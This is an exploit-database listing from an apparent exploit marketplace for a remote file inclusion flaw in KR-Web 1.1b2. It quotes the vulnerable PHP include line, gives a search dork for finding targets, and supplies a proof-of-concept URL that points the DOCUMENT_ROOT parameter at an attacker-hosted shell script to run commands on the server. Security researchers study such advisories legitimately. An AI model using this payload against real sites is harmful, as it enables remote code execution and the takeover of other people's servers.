[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

KR-Web <= 1.1b2 Remote File Inclusion Vulnerability

Author
cr4wl3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10016
Category
web applications
Date add
24-11-2009
Platform
unsorted
===================================================
KR-Web <= 1.1b2 Remote File Inclusion Vulnerability
===================================================

########################################################################
#KR-Web <= 1.1b2 Remote File Include Vulnerability
#Download Script      :  http://sourceforge.net/projects/krw/files/
#Dork                 :  die("Hacking attempt");  :D
########################################################################
#
#Vuln : ./KR-Web-1.1b2/adm/krgourl.php (line 2)
#       <?php
#          include "$DOCUMENT_ROOT/paths.inc";
#       ?>
#PoC  :  http://server/[path]/adm/krgourl.php?DOCUMENT_ROOT=http://attacker.com/shell.txt?cmd
#
#
#
########################################################################



#  0day.today [2024-06-30]  #